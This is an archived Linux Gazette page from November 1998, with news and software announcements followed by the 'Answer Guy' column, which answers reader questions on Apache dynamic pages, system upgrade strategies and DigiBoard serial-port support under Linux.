IDGs Web Publishing Inc. announced the launch of LinuxWorld magazine (http://www.linuxworld.com). A Web-only magazine supplying technical information to professional Linux users who are implementing Linux and related open source technologies in their computing environments.

Inside the first issue are stories such as an interview with Linus Torvalds, the first installment of the Linux 101 column titled "A distribution by any other name," and a look at the new Windows NT domain security features found in Samba 2.0 titled "Doing the NIS/NT Samba."


 Linux Expo 1999 Call for Papers

May 18 - 22, 1999
Raleigh, North Carolina
Dates for Refereed paper submissions

Program Committee

Overview

The goal of the technical track of Linux Expo is to bring together engineers and researchers doing innovative work associated with Linux.

See you at LinuxExpo '99!


 USENIX 1999 Events

USENIX is the Advanced Computing Systems Association. Its international membership includes engineers, system administrators, scientists, and technicians working on the cutting edge. Their conferences are recognized for delivering pragmatically-oriented, technically excellent reports in a highly interactive, vendor-neutral forum.

Upcoming Events for 1999


 SmartWare DevCon99

Date: Wed, 28 Oct 1998 20:28:52 -0600
DevCon99 is scheduled for November 14 and 15, 1998. 49 hours of training shoehorned into two days including "How to Use the Graphic Database Frontend", Developing a RAD application, the introduction of the SmartERP program, marketing, advertising and free videotapes for all attendees. SmartWare2000, offers solutions for the small to medium company and is the only product capable of running on everything from old 286 ATs up to Sun or SiliconGraphics systems and use the same data at the same time.

When: November 13 (Dinner at Clubhouse Inn), 14 & 15
Where: Washburn University, Topeka, Kansas
What: 2 Full Days of training on SmartWare2000, The Graphic Database Front End, RAD, Free SmartWare2000, Food, Room, Videos and more.

For more information:
Greg Palmer,


 Linux Links

Linux FAQ: http://www.terracom.net/~kiesling/

QtEZ, a GUI builder for the Qt library: http://qtez.zax.net/qtez/

Blackmail 0.29: http://www.jsm-net.demon.co.uk/blackmail/source/blackmail-0.29.tar.gz

SGMLtools homepage: http://www.sgmltools.org/

Distribution Answers: http://www.angband.org/~joseph/linux/ Mini-howto on setting up Samba on Red Hat Linux: http://www.sfu.ca/~yzhang/linux/

PostgreSQL Database HOWTO: http://sunsite.unc.edu/LDP/HOWTO/PostgreSQL-HOWTO.html

DragonLinux: IronWing: http://members.tripod.com/~dragonlinux/


Software Announcements


 Cygnus Solutions Announces Low Cost Verions of GNUPRO Toolkit for Linux

Cygnus(R) Solutions announced the availability of GNUPro(TM) Toolkit, a new product line of fully tested, low-cost development tools releases for native and embedded software developers. Addressing the needs of the growing Linux community, the first release of Cygnus GNUPro Toolkit is targeted at software engineers developing commercial applications on the Linux operating system (OS). Today's announcement marks the first in a series of GNUPro Toolkit releases planned for a range of platforms. "Cygnus has extended its commitment to the Linux community and users of Red Hat Linux by providing a fully-certified official release of GNU development tools," said Bob Young, president and CEO of Red Hat Software. "Given the increasing popularity of both Red Hat Linux and Cygnus GNUPro, Red Hat is pleased to continue its partnership with Cygnus to provide software developers the highest quality Linux operating system and development tools."

Key Features and Benefits

Pricing and Availability

Cygnus GNUPro Toolkit for Linux is priced at $149 and is immediately available for Red Hat Linux 4.2 and 5.1 on x86 platforms by ordering online at http://www.cygnus.com/gnupro/.


 Panorama

Panorama is part of the GNU project. For more information about it, visit the URL 'http://www.gnu.org'. It is released under the GPL license, that you can read in the file 'LICENSE' in this directory.

Panorama is a framework for 3D graphics production. This will include modeling, rendering, animating, post-processing, etc. Currently, there is no support for animation, but this will be added soon.

Functionally, it is structured as an API, composed by two dynamic libraries, and several plugins, that you can optionally load in runtime. A simple console mode front-end for this API is included in the package, that can load a scene description in one of the supported scene languages, and then outputs a single image file in any of the supported graphic formats.

Panorama can be easily extended with plugins. Plugins are simply dynamically linked C++ classes. You can add plugins without recompilation, and even in runtime, when this option is added to the graphic interface.

You can find more information about Panorama, or download latest distribution at: http://www.gnu.org/software/panorama/panorama.html


 Netscape Wrapper v2.0.0

What is it:
The Netscape Wrapper is a bourne shell script used to invoke Netscape on a Unix platform. It performs copying initial default files, a postscript bug work around, security check, and setting up the environment. The new version also provides enhanced functionality.

What is new in this version:

The most significant change is that the script will attempt to open a new browser before executing Netscape. IE if no Netscape process is present, Netscape will be executed, otherwise a new browser window is created. Likewise when using the new option subset, if Netscape is not running, it will be execute with that option as the default window, or if Netscape is running, that option will be opened using the current process.

ftp://ftp.psychosis.com/linux/netscape-wrapper_2.0.0


 plotutils

Version 2.1.6 of the GNU plotting utilities (plotutils) package is now available. This release includes a significantly enhanced version of the free C/C++ GNU libplot library for vector graphics, as well as seven command-line utilities oriented toward data plotting (graph, plot, tek2plot, plotfont, spline, ode, and double). A 130-page manual in texinfo format is included.

As of this release, GNU libplot can produce graphics files in Adobe Illustrator format. So you may now write C or C++ programs to draw vector graphics that Illustrator can edit. Also, the support for the free `idraw' and `xfig' drawing editors has been enhanced. For example, the file format used by xfig 3.2 is now supported.

RPM's for the plotutils package are available at ftp://ftp.redhat.com

For more details on the package, see its official Web page.


 PROCMETER V3.0

This is a new version of ProcMeter that has been re-written almost completely since the previous version.

It is now designed to be more user-friendly and customisable, the textual as well as graphical outputs and the extra mouse options avilable are part of this. It is perhaps now less of a system status monitor and more of a user information display. It can be configured to show the date and/or time instead of having a clock and it can also monitor your e-mail inbox and act like biff.

The ProcMeter program itself is a framework on which a number of modules (plugins) are loaded. More modules can be written as required to perform more monitoring and informational functions. Available at ftp://ftp.demon.co.uk/pub/unix/linux/X11/xutils/procmeter3-3.0.tgz

Take a look at the ProcMeter web page


 ypserv 1.3.6

Version 1.3.6 of an YP (NIS version 2) Server for Linux is released. It also runs under SunOS 4.1.x, Solaris 2.4 - 2.6, AIX, HP-UX, IRIX, Ultrix and OSF1 (alpha).

The programs are needed to turn your workstation in a NIS server. It contains ypserv, ypxfr, rpc.ypxfrd, rpc.yppasswdd, yppush, ypinit, revnetgroup, makedbm and /var/yp/Makefile.

ypserv 1.3.6 is available under the GNU General Public License.

You can get the latest version from: http://www-vt.uni-paderborn.de/~kukuk/linux/nis.html


 MAM/VRS

MAM/VRS is a library for animated, interactive 3D graphics, written in C++. It works on Unix (tested on Linux, Solaris and Irix) and Windows 95/98/NT. MAM/VRS can produce output for many rendering systems: OpenGL (or Mesa), POVRay, RenderMan and VRML are supported yet. It provides bindings to many GUIs: Xt (Motif/Lesstif/Athena), Qt, Tcl/Tk, MFC and soon GTk. It is covered by the terms of the GNU LGPL. Visit our homepage for more information and to download it: http://wwwmath.uni-muenster.de/~mam


 KIM - interactive process manager 1.1-1

Description:
The Kim is interactive (ncurses) user friendly process manager for OS Linux. It reads the /proc(5) directory. The '/proc' is a pseudo-filesystem which is used as an interface to kernel data structures.

Features:

Download:

* source, rpm, deb

URL: http://home/zf.jcu/cz/~zakkr/kim/

Version & Dependency:
The Kim is independent on other program, but all version depend on libproc >= 1.2.6 and ncurses.

Lincense:
Copyright (c) 1998 Zak Karel "Zakkr"


 PIKT

PIKT is a set of programs, scripts, data and configuration files for administering networked workstations. PIKT's primary purpose is to monitor systems, report problems (usually by way of e-mail "alerts"), and fix those problems when possible. PIKT is not an end-user tool; it is (for now) to be used by systems administrators only.

PIKT includes an embedded scripting language, approaching in sophistication several of the other scripting languages, and introducing some new features perhaps never seen before.

PIKT also employs a sophisticated, centrally managed, per-machine/OS version control mechanism. You can, setting aside the PIKT language, even use it to version control your Perl, AWK, and shell scripts. Or, use it as a replacement for cron.

PIKT is freeware, distributed under the GNU copyleft.

Check out the Web Page for more info!


 Yard 4.04.03

YARD-SQL version 4.04.03 has been released. Until now, it is available for Linux and SCO-UNIX and contains the following new features:

Check out http://www.yard.de for more information about YARD


 RealSecure 3.0

ISS today announced RealSecure 3.0, a new, integrated system that combines intrusion detection with state-of-the-art response and management capabilities to form the industry's first threat management solution. Formerly known as "Project Lookout", RealSecure 3.0 is the integrates network- and system-based intrusion detection and response capabilities into a single enterprise threat management framework providing around-the-clock, end-to-end information protection.

Visit the ISS web site.


 Applix Released Applixware 4.4.1 for Linux, UNIX, and Windows Platforms

Applix, Inc. the release of Applixware 4.4.1 for the Linux platform as well as all major UNIX operating systems, Windows NT and Windows 95. This latest release delivers a new filtering framework that has been optimized for document interchange between Microsoft's Office 97 product, as well as Y2K compliance.

Applixware includes Applix Words, Spreadsheets, Graphics, Presents, and HTML Author. This Linux version also includes Applix Data and Applix Builder as standard modules. Applixware for Linux is available directly from Applix, as well as from its partners, including Red Hat and S.U.S.E.

Linux version beta test users also attest to the results. "Export of Applix Words documents to Word 97 works great, even with Swedish letters," said Klaus Neumann, a university cognitive scientist. He continued, "I think Applixware is the most promising office solution for Linux. I've tried StarOffice, WordPerfect, Lyx. Nothing comes even close to Applixware--there are none of the memory, uptime, printing, or spell-checking problems I experience with the other suites."

Applixware 4.4.1 for Linux includes for the first time Applix Data, a new module offering point and click access to information stored in relational databases. No SQL knowledge is required to access the information. Once accessed, the data can be linked directly into Applix Words, Spreadsheets, Graphics, Presents, and HTML Author.

Visit the company's web site for more information.


 iServer

Servertec announced the release of iServer, a small, fast, scalable and easy to administer platform independent web server written entirely in JavaTM.

iServer is a web server for serving static web pages and a powerful application server for generating dynamic, data driving web pages using Java Servlets, iScript, Common Gateway Interface (CGI) and Server Side Includes (SSI).

iServer provides a robust, scalable platform for individuals, work groups and corporations to establish a web presense.

Visit the Servertec Web site for more information.


 TkApache v1.0

TkApache v1.0 was released unto the unexpecting world Thursday, October 16th. In it's first few hours, more than a 1,000 downloads were logged!

Anyway, it's a fully GUI front-end to managing and configuring an Apache web server and it's written in PerlTk - released under the GPL, developed COMPLETELY under Linux, Website, graphics, code, etc.

The TkApache home page could tell you a lot more...


 Crack dot Com is closing its doors

WHY: Ran out of cash.

REALLY WHY: Lot of reasons, but then again, there are a lot of reasons that we got as far as we did. I think the killer reason, though, was that Golgotha was compared by publishers primarily to Battlezone and Uprising, and those titles sold really poorly.

WHAT NOW?: Now we file articles of dissolution w/ the secretary of state, and we file bankruptcy.

IS THAT IT?!: No.

WHAT ELSE?: We're releasing the Golgotha source code, and data to the public domain.

WHERE'S THE SOURCE CODE?: I want to personally thank everyone who supported & rooted for us. That was really nice of you.

BLAH BLAH, WHERE'S THE SOURCE?: I want to apologize to the fans and business partners we've let down.

BOO HOO! WE CARE. OUT WITH IT!: Thanks for your patience. The source & data can be found at http://www.crack.com/golgotha_release. And of course, the ex-Crack developers are up to new & interesting things which you can follow at the web site.

Sincerely, Dave Taylor


Published in Linux Gazette Issue 34, November 1998


[ TABLE OF CONTENTS ] [ FRONT PAGE ]  Back  Next


This page written and maintained by the Editor of Linux Gazette,
Copyright © 1998 Specialized Systems Consultants, Inc.

(?) The Answer Guy (!)


By James T. Dennis,
Starshine Technical Services, http://www.starshine.org/


Contents:

(!)Greetings From Jim Dennis

(?)dual /boot partitions --or--
Automated Recovery from System Failures
(?)e-mail quotas --or--
Quotas for Outgoing e-mail
(?)Booting and partitions --or--
Suggestions for Linux Users with Ultra Large Disks
(?)French loadkeys --or--
More on International Keyboard Mappings and Monochrome X
(?)Digi C/X Host W/ C/Con 16 --or--
Linux Support for the DigiBoard C/X Intelligent Serial Ports
(?)Shell File!!!!! --or--
All that Vaunted Support for those Windows Users
(?)apache server --or--
Executing "Normal HTML" Files with Apache
(?)Keeping my RH5.0 system up to date --or--
Updates: Risks and Rewards
(?)Ether Troubles --or--
NE2000 "clones" --- not "cloney" enough!
(?)"Good Times"-email is it a virus? --or--
The Infection and the Cure: (Good Times as a Virus)
(?)Query
(?)... Redhat 4.2/Motif, problem discovered. --or--
Conflict: Num-Lock, X Window Managers, and pppd
(?)Re Script
(?)Here's a doozy --or--
Telnet/xterm: Log to file
(?)RE how to find out the serial connect speed of a modem
(?)HELP!! --or--
Finding Soundcard Support
(?)Problems with backup --or--
Problems with a SCSI Tape Drive
(?)Is there a testsuite for glibc v2.0.x? --or--
Test Suites for GNU and other Open Source (TM) Software
(?)nt 4.0 ras dialin problem --or--
Another Non-Linux Question
(?)Macro Virus?
(?)xdm --or--
Remote X using xdm


(!)Greetings From Jim Dennis


(?)Executing "Normal HTML" Files with Apache

From ajrlly on 26 Sep 1998

is there a way to configure apache so that when someone requests a particular page (ie http://www.whatever.com/~user/index.html) that a cgi script is automatically invoked, transparent to the requestor. The goal is to have a diff page served depending on the ip address.

thnx

(!)I think you could use the "x-bit hack" feature --- mark the index.html page as a Unix/Linux "executable" and use SSI (server-side include) directives to accomplish this.
There are also various modules for Apache to support XSSI (extended server-side includes) ePerl and EmbPerl (embedded perl interpreters which execute code your documents), and other forms of dynamic output.
For real details you should probably read the FAQ --- try http://www.apache.org for access to that.
In addition that FAQ recommends the comp.infosystems.www.servers.unix newsgroup for general support. There are also a couple of companies that offer commercial support for the system.
You can read about new developments in Apache by regularly visiting the Apache Week web site (http://www.apacheweek.com) Which should probably be right next to "Linux Weekly News" http://www.lwn.net, on your lists of weekly sites to visit.
Unfortunately they don't seem to have an "answer guy" over at Apache Week --- so we can't forward your question off to him.
Personally I don't like the idea of publishing different "apparently static" web pages based on the IP address of the requestor. First it seems deceitful. Also IP addresses and DNS domains (reverse or otherwise) are very poor ways of identifying users or readership. In addition these sorts of "dynamic" pages put extra load on the server and add additional latency to the request. This is a particularly bad idea for index.html pages --- which are the most often accessed.
I think it is best to identify what you really want the world to see (a process of writing, composition and publication) and put that into your main static web pages. If you need timely or periodic updates (web counters, whatever) use a cron job to periodically re "make" to static pages from their "sources" (templates) using the text processing tool of your choice (m4 and the C preprocessor, cpp seem to be particularly popular for this, although many specialized tools exist for the task).
Part of this also depends on what you really trying to do. For example if you want "internal" users to see one set of pages and "external" users to see another --- you best bet is to configure your server with two interfaces (or at least IP aliases) and use the Apache "Bind" directive to bind one copy of the Apache server to one IP address/interface and a different one (with different configuration, document root, etc) on the other).
Naturally each of your virtual hosts ("soft" using HTTP 1.1 features, or "hard" requiring separate IP addresses) can have completely different document roots and many other configuration differences. All of that falls under the category of "virtual hosting" and is covered pretty extensively in the Apache documentation (which is all avialable at the aforementioned web sites).
If you're trying to provide information in a different language or format based on the source of the request you should read about "Content Negotiation" at:
Apache Week: 26th July 1996
http://www.apacheweek.com/issues/96-07-26
If you're attempting to do this based on "security" or "cookies" there extensive methods for doing this supported by Apache -- and most of them are most easily accomplished by performing "redirection" as the connection is established.
For real security --- to provide web pages to your "extranet" partners (strategic customers, vendors, etc) and your mobile employees --- I wouldn't suggest anything less then "client side certificates" over SSL (secure sockets layer --- a set of encryption protocols, proposed by Netscape and implemented by many browsers and in several other packages. The dominant "free" SSL code base is SSLeay --- by Eric A. Young of Australia).
These sorts of certificates are issued to users on and individual basis (they can be from a recognized third party CA --- certifying authority --- or you can create your own "in-house" CA and accept those, exclusively or otherwise.
There are a large number of modules available for Apache, some to things like block access based on the "Referrer" value (to prevent other web sites from using your pictures and bandwidth by "reference", for example), or to fix UpperVSLOWER/CasING/ problems in the requeste URL's, and a couple of different ones to perform rewriting of request URL's --- like the mod_rewrite module which supports full regex re-writes and some weird conditional and variable assignment features.
It appears that the "official" place to learn about Apache modules seems to be the "Module Registry" at http://www.zyzzyva.com

[ It moved to http://modules.apache.org/ which is much easier to remember too. Update your bookmarks, everybody :) -- Heather ]


(?)Updates: Risks and Rewards

From Frits Hoogland on 08 Oct 1998

Hi almighty answerguy!

I'm a bit confused by all the updates of various system components (like the libc, gcc, etc, etc). Is it advisable to loop at ftp.redhat.com for updates of my 5.0 system? Is it advisable to download a new kernel? Can I install let say kernel 2.0.35 (which, as I noticed, nearly everyone uses) or are there things I have to consider, things I have to check, etc.?

(!)That's an excellent question. Using Red Hat's package management system (RPM) does make it faster and easier for most "mere mortals" (myself included) to upgrade most packages and install most new ones.
Debian package management is allegedly at least as good --- but it doesn't seem to be documented nearly as well so it's harder to learn than RPM. (Hey, Debian dudes if you write a DPKG/APT Guide for RPM users --- you might win more converts!).
Even Slackware's pkgadd (or is that pkg_add, it's been so long) is somewhat easier than the old "manly" way of upgrading your software (downloading the sources, and building them yourself).
Indeed, even that approach (building from sources) has improved quite a bit over the years, for most packages. The mark of a good modern package is that you can install it, from source with the following sequence of commands:
tar tzf /usr/local/from/foo.tar.gz
# look at contents, insure that it creates
# it's own directory tree and puts everything
# in there:
tar xzf ....
cd /usr/local/src
# extract the sources into our local source
# tree.  (Might need to do a mkdir and cd into
# that if your package extracts to the "current"
# directory).
cd $package_source_top_level_dir
view README
# or 'more' or 'less' -- maybe different README's
# This should have some basica instructions
# which ideally will amount to:
./configure
# possibly with options like --prefix=/usr/local
make install
... Note that the really important parts of this are './configure' and 'make install' After that a good source package should be ready to configure and run.
(Note that the "configure" command in my examples is a script generated to perform a set of local tests and select various definitions that are to be used by the make file. This, in turn, tells the local system how to "make" the program's binaries, libraries, man pages and other files in a way that's suitable for your system --- and (with the commonly implemented "install" option or "target" in "makefile" terms) tells the 'make' command where to put things. There is a difference between "./configure"-ing the sources to be build and "configuring" the resulting package).
In any event, with RPM's you get the package (for your plattform: x86, Alpha, SPARC, PowerPC, etc) and type:
rpm -i foo-$VERSION.$PLATFORM.rpm
... or whatever the file's name is. To upgrade a source package you follow mostly the same procedure for sources (usually saving any configuration files and/or data from the previous versions, and maybe moving or renaming all of the old libs and bins and other files). It would be nice if source package maintainers make upgrades easier by detecting their prior installed version and suggesting a "make upgrade" command --- or something like that).
To upgrade a typical RPM you just type:
rpm -U foo.....rpm
There are similar commands for Debian, but I don't know them off the top of my head and they aren't handy to look up from this S.u.S.E. (RPM) system.
(I'm sure I'll get flamed for the perceived slight --- oh well. Comes with the territory. Please include techie info and examples with the flames).
Now, when it comes to major system upgrades (like libc5 to glibc, and from a 1.x kernel to a 2.x kernel) it's a different matter.
If you have a libc5 system and you just install glibc unto it; there's no real problem. The two will co-exist. All of your existing libc5 programs will continue to load their shared libraries, and all your glibc2 (a.k.a. libc6) linked programs should find the new library. Running a mixture of "typical" programs from both libraries will have not important effects (although you'll be using more memory than you would if all you binaries are linked against the same libraries.
Notice I said "typical" --- when it comes to system utilities, like the 'login' command there are some interactions that are significant and even incompatible. I've heard that the format of the "utmp" and "wtmp" records are different (these are user and "who" log files) which are accessed by a whole suite of different utilities (like the 'who' and 'w' commands, the 'login' and 'xdm' commands, 'screen' and other utilities).
So, it's best to upgrade the whole system to glibc at once. (The occasional application, one that is not part of the base "system" and isn't "low level" that uses a different version/set of libraries won't be a problem).
With most recent kernels you can install the sources under /usr/src/linux and running the following command:
make menuconfig
(go through a long list of options to customize the kernel to your system and preferences)... or copy in your old .config file and type:
make oldconfig
... to focus on just the differences between the options listed/chosen for your previous kernel and the new one.
Then you'd type something like:
make clean dep install modules modules_install
... and wait awhile.
I've done kernel upgrades that were that easy. Usually I read the "changelog" and other text files, and the help screens on most of the new options (I usually also have to refresh my memory on a couple dozen old options).
These are major upgrades because they can affect the operation of your whole system.
Recently my father (studying Mathematica) needed a better video card. This was an old VLB (VESA Local Bus) 486 running Red Hat 4.1. So I decided to build a new system (Pentium 166, PCI video card, new 6Gb UDMA hard disk) and upgrade his system to Red Hat 5.1.
So, here's how I did that:
Build new hardware, boot from a customized copy of Tom Oehser's "root/boot" diskette (http://www.toms.net/rb) and connect to the LAN using a temporary IP address that we have reserved for this purpose.
I then run fdisk on the new drive and issue a command like:
for i in 1 3 5 6 7; do mk2efs -c /dev/hda$i; done
(to make filesystems all all of the partitions, root, rescue root, /usr, /home and /usr/local). I go away and answer e-mail and get some coffee, getting thoroughly side tracked.
A day or so later I remember to finish work on that (he reminds me that he has some homework to do).
Now I mount all of these filesystems they way I want them to be later (when I reboot from the hard disk). So I mount the new rootfs under /mnt/den (the machine's name is Deneb --- an obscure star) and the new usr under /mnt/den/usr and the new /usr/local under /mnt/den/usr/local (etc).
Then I copy his old /etc/passwd and /etc/group file into the ram disk (see below) and issue a command like the following:
rsh deneb "cd / && find . | cpio -o0BH crc " \
| ( cd /mnt/den && cpio -ivumd )
... this copies his entire existing system to the new system.
When that's done (doesn't take long, but I don't time it --- it runs unattended until I get back to it), I edit the /mnt/den/etc/fstab, run a chroot command (cd /mnt/den && chroot . /bin/sh) fix up the lilo.conf file and run /sbin/lilo, and reboot (with the root/boot diskette removed.
Now I've replicated his whole system (and accidently knocked his off of our LAN because I forgot to reset the IP address of this box). So, I fix that.
I make a last check to make sure that everything *really* did copy over like I wanted:
cd / ; rsh den " cd / && tar cf - . " | tar df -
... this copies all of his file back over the net again (this time using 'tar' instead of cpio), but the receiving copy just compares (diffs) the incoming file "archive" (from it's standard input, a.k.a. the pipelined data) rather than extracting them and writing them into place.
This reports a few differences among some log files, the /etc/ files that I modified, and it gives some errors about "sockets" (Unix domain sockets show up in your file tree as little filenames with the "s" as the leading characters in an 'ls -l' output; there are about five or six of these on a typical system, one for your printer, one for you syslog and one or two for any copies of X Windows or 'screen' you may have run. These should not be confused with "internet domain" sockets which only exist in memory and go through your IP interfaces).
I presume that the tar diff feature simply doesn't support Unix domain sockets, it's probably a bug, but not a significant one to me.
A different bug in 'cpio' is a bit irritating and I have to report it to their maintainer. Remember how I copied over my old passwd and group files before the transfer? There's *supposed* to be an option to "use the numeric UID and GID" (-n or --numeric-uid-gid) in 'cpio' (and a similar one in newer versions of 'tar'). However, my copies (on several machines from several distributions around the house) all just give an error if I try to use that switch. Not a reasonable error message like: "option not supported" or "don't do that you moron" --- just a stubborn insistence on printing the "usage" summary which clearly shows these options as available!
The quickest workaround is to just copy of the passwd and group files to the local system before attempting the "restore" (replication). One time when I failed to do this (using a version of 'tar' that didn't support the feature) it squashed the ownership of every file to 'root' --- resulting in a useless system. Luckilly I was just playing around that other time, so I learned to watch out for that.
So, now I just slip in my Red Hat 5.1 CD (courtesy of the IBM booth at last week's ISPCon in San Jose --- where they were giving them out). I think IBM's booth got them from the BALUG (Bay Area Linux Users Group) which is still trying to scrape up a few hundred bucks to pay for the 'free' booth they were offered. (Free means no fees to the convention co-ordinators; we went out of pocket for "renting" tables and chairs and paying for a power extension for the demo computer).
From there I just let the RH 5.1 upgrade process run its course.
What!?! All that work just to let run the upgrade?
Yep!
I spent years in technical support (MS-DOS and Windows markets). I consider vendor and OS upgrades to be the most dangerous thing you can do on your computer. I'm sure they've caused more downtime and lost data than failed hard drives, virus infections, stupid users (other than the stupidity of blind updates), and disgruntled employees.
So, I like to make sure that I can get back to where I started. For me, that means "start with a copy of the system or a restore of the system's backups" I've been known to take a hard drive out of a system, install a new one, restore the backup to that and then to the restore to the "new" system. (The old hard drive stays on a shelf until the data on it is so out of date it would be worth copying back in --- then gets rolled into some other system, or the same one, as "extra disk space").
Now, please don't take this as a personal attack on Linux or Red Hat. So far they haven't failed me. I have yet to see an "upgrade" destroy one of my systems. However, my professional experience as proven to me that this is the right approach even for one of my home systems.
In this case the upgrade was silky smooth. I had to fuss a little to get in a new X server (different video card, remember) and the new system really didn't like the PS/2 mouse that I have it (which was of no consequence, since my father uses a serial port trackball, so the mouse that I had in /dev/psaux was just a temporary one anyway).
Oh, yeah, I had to compile a new kernel to support the ethernet card I'm using (a Tulip based Netgear). There was probably a module laying around the CD for it somewhere --- but so what. It's a good test for the system.
At this point the old computer sitting in the living room, and the new one is in his room running Mathematica. In a week or so (when we're really convinced that everything is really O.K with the new box) I'll prep that old 486 up as a server (my colocated server is do for an upgrade --- so this one will go in for it, and that one will become the spare and test bed).
I can understand how most users don't want to have whole systems around as spares. However, these days, it's not too expensive to keep an extra 6Gb hard drive laying around for these sorts of "major" upgrades. It's also a good way to insure that your backups are working (if you use the "restore" method rather than a network "replication" trick).
Note that this whole process, as complicated as it sounds, only takes a little more "human" time than just slipping in the CD and doing it blindly. The system keeps pretty busy --- but I don't wait for it, I only issued 10 commands are so (I have a couple of scripts for "tardiff" and "replicate" to save some of the typing).
For the daring you can run a program called 'rpmwatch' (or Red Hat or other RPM based systems) or "autoup.sh" (Debian). You point these at your favorite mirror and they will automatically update new packages.
Of course this is "daring" --- I personally wouldn't consider it from any public mirror site. I have recommended it to corporate customers, where they point their client systems at an internal server and their staff posts rpm's after testing (limited automated deployment). This is a little easier for some sorts of upgrades than using 'rdist' and home brewed scripts.
In terms of upgrades --- my main "gateway" (router, server, mailhost, uucp hub, and internal web server) is an old 386/33 --- it's about a decade old, has 32Mb of RAM and single, full SCSI chain with a few Gig of disk space). It runs an old copy of RH 4.2, which is an upgrade (disk replication/swap method) from 3.03, which is an upgrade from Slackware 1.(something), which was an upgrade (wipe and re-install from scratch) from SLS something (running a 0.99p10 kernel).
I used to use that machine (antares) for everything (even X --- it has a 2mb STB Powergraph video card that cost more than a new motherboard would have). However, these days I mostly use 'canopus' -- a S.u.S.E. 5.1 upgraded to 5.3 (blindly --- I was feeling lazy!) My wife mostly uses her workstation, 'betelgeuse' --- which came from VA Research with some version of Red Hat (read the review I wrote for Linux Journal if you're really curious) --- and was upgraded (new installation on new drive, copy the data) to S.u.S.E. 5.2.
So, you can see that we've used a variety of upgrade strategies around the house over the years.
As for installing a new kernel. Do a good backup. Now ask: Can I afford a bit of down time if I break the system (while I restore it)? If the answer is "Yes" than go get a 2.1.124 (or later) kernel and try that. We're getting really close to 2.2 and only a few thousand people have tried the new kernels. So we want lots of people to at least try the current releases before we finally go to 2.2.
(Linus doesn't want to have 36 "fix" releases to the next kernel series).
The new kernel should be much faster in TCP/IP performance (already one of the fastest on the platform) and much, much faster in filesystem performance (using the new dcache system).
So, try the new kernel. Be sure to get a new copy of pppd if you use that --- the kernel does change some structure or interface that the old version trips on.
This upgrade will not be nearly as big a deal as the 1.2 to 2.0 shift (which was the most disruptive in the history of Linux as far as I can tell --- the formats of entries under /proc changed, so it broke the whole procps suite of utilities, like the 'ps' and 'top' commands). I haven't seen any such problems from the 2.0 to 2.1 kernels (I'm running a 2.1.123 at the moment, on canopus. antares is running on 2.0.33 or so --- it is least frequently upgraded because it is the server.

(?)Looking forward to your answer. Frits.


(?)Linux Support for the DigiBoard C/X Intelligent Serial Ports

From Dave Barker on 08 Sep 1998

I'm trying to setup a Linux RH 5.0 box as a dial in server using a DigiBoard C/X host adaptor and a 16 port C/Con 16 Concentrator. What I'd like to know is:

Does Linux support Software controlled Serial Ports, meaning the current attempt has been to set up a 15MB dos partition as the boot, and install the DOS drivers from Digi, and then add the com ports into linux?

(!)The question (as stated) is flawed. On a PC all multi-port serial boards require some form of software to control them (since the BIOS/firmware only supports 4 COM ports). In addition the BIOS support for COM ports is extremely limited and slow --- so all communications software (under DOS, Windows, OS/2, Linux and other forms of UNIX, etc) have bypassed the firmware and used direct access to the I/O ports that control the serial ports as well as those that actually carry the serial data).
So, a more reasonably restatement of your question might be:
Can Linux use the DOS drivers supplied by Digi?
... that answer is "no." (It is also "no" for NT, other forms of UNIX, OS/2 and probably for Win '95/'98 as well).
Device drivers are generally not portably between operating systems. The interface between an OS kernel and its device driver is typically unique for each OS. There has been some discussion about creating a portable PC device driver specification --- to allows SCO, Solaris, Linux, and *BSD drivers to share (at least some) device drivers. That will probably never happen --- and even if it does it will probably never extend to non-Unix-like operating systems.
Now, regarding the broader question:
Does Linux support the Digi C/X intelligent serial port subsystem?
When I last corresponded with Digi about this they assured me that they would have native Linux drivers by the end of that summer. That was over a year ago. I did check back on their web site a couple of months ago and it didn't seem to indicate that they'd ever delivered on this promise.
The obvious thing to do would be to contact their support staff and ask for native Linux drivers. It may be that their web site is out of date, or that my efforts t weed through their pages was inadequate (the bigger the company, the worse their web site).

[ I dunno about the Digi International site, (which is being redesigned right now) but the Linux Digiboard Page might be useful, even though it's rather old. -- Heather ]

(?)Next if this would work in theory what is the proper way to go about setting the serial ports up?

(!)The "proper way" would be to use the device drivers that work with your OS. Another way, might be to run the DOS drivers under 'dosemu' (configuring that with sufficient access to the hardware and I/O permissions map that the Linux kernel will let it drive the serial board). However, that would only allow DOS to access the devices.
In the project where I initially contacted them I was using an operating system called TSX-32 (by S&H systems: http://www.sandh.com) --- and the TSX-BBS (also by them).
This package is a 32-bit multi-user commercial (closed source) OS that's modeled after the old TSX-11 and RSX-11 (a predecessor to VMS on the PDP-11 platform). It also runs a decent DOS emulator and the BBS has some nice features that make it more scalable than any other that I'd seen
(I've run Galacticomm MajorBBS and eSoft TBBS systems which used to be limited to single CPU's, had no TCP/IP support, no end-user scripting facilities, limited support for doors, and little or no support for intelligent serial hardware --- such that 255 was about the maximum --- PCBoard as limited to about 4 to 8 lines per PC --- and you needed a Netware server to cluster those. TSX-BBS can handle 250 lines per server and multiple servers can peer over TCP/IP for a potential of thousands of lines).
Obviously Linux (and other forms of Unix) have that sort of scaleability --- given the drivers. There are some big Unix/Linux BBS' out there (like MMB "Teammate" and a native port of Galacticomm's BBS --- renamed to something like "WorldPort" --- though I don't remember the details).
My enthusiasm for TSX-BBS has waned a bit (they aren't getting out the updates that I'd hoped for). However, that's a non-issue since I left that position long ago and no longer have to maintain any BBS' (and the whole dial-up bulletin board system phenomenon seems to have waned almost as much as UUCP).

(?)I'm really in a bind here, and could use any help I can get! Thanks in advance David Barker

(!)I would beat up on Digi --- and, if they don't satisfy your needs --- consider one of their other models (a number of them do support Linux) or Rocketport, Equinox, Comtrol, Cyclades, Stallion, or other vendors of multi-port serial hardware that will support Linux.
Naturally I understand that this may entail major reworking of your plan. The C/X is the only system that I know of that allows you to connect 250 ports to a PC using only one bus slot. You might have to rework your plan to use multiple Linux systems, each with multiple serial port board, and configure those as "terminal servers" (have them binding the incoming serial/phone connections into 8-bit clean rlogin/telnet sessions to the master server.
Of course you could also look at traditional terminal servers. These are router-like devices that do precisely what I've described (often with support for their own authentication --- RADIUS and/or various versions of TACACS, and support to provide PPP and/or SLIP instead of the rlogin/telnet like session that would be used for dial-up terminal use.
Naturally to give you better advice and more specifics I'd have to know more about your requirements and less about the particular problems you're encountered with your currently proposed solution. All I can currently guess about your requirements is that you need support for a bunch of serial lines (you said "dial-in" so I can also guess that a bunch of modems are involved).
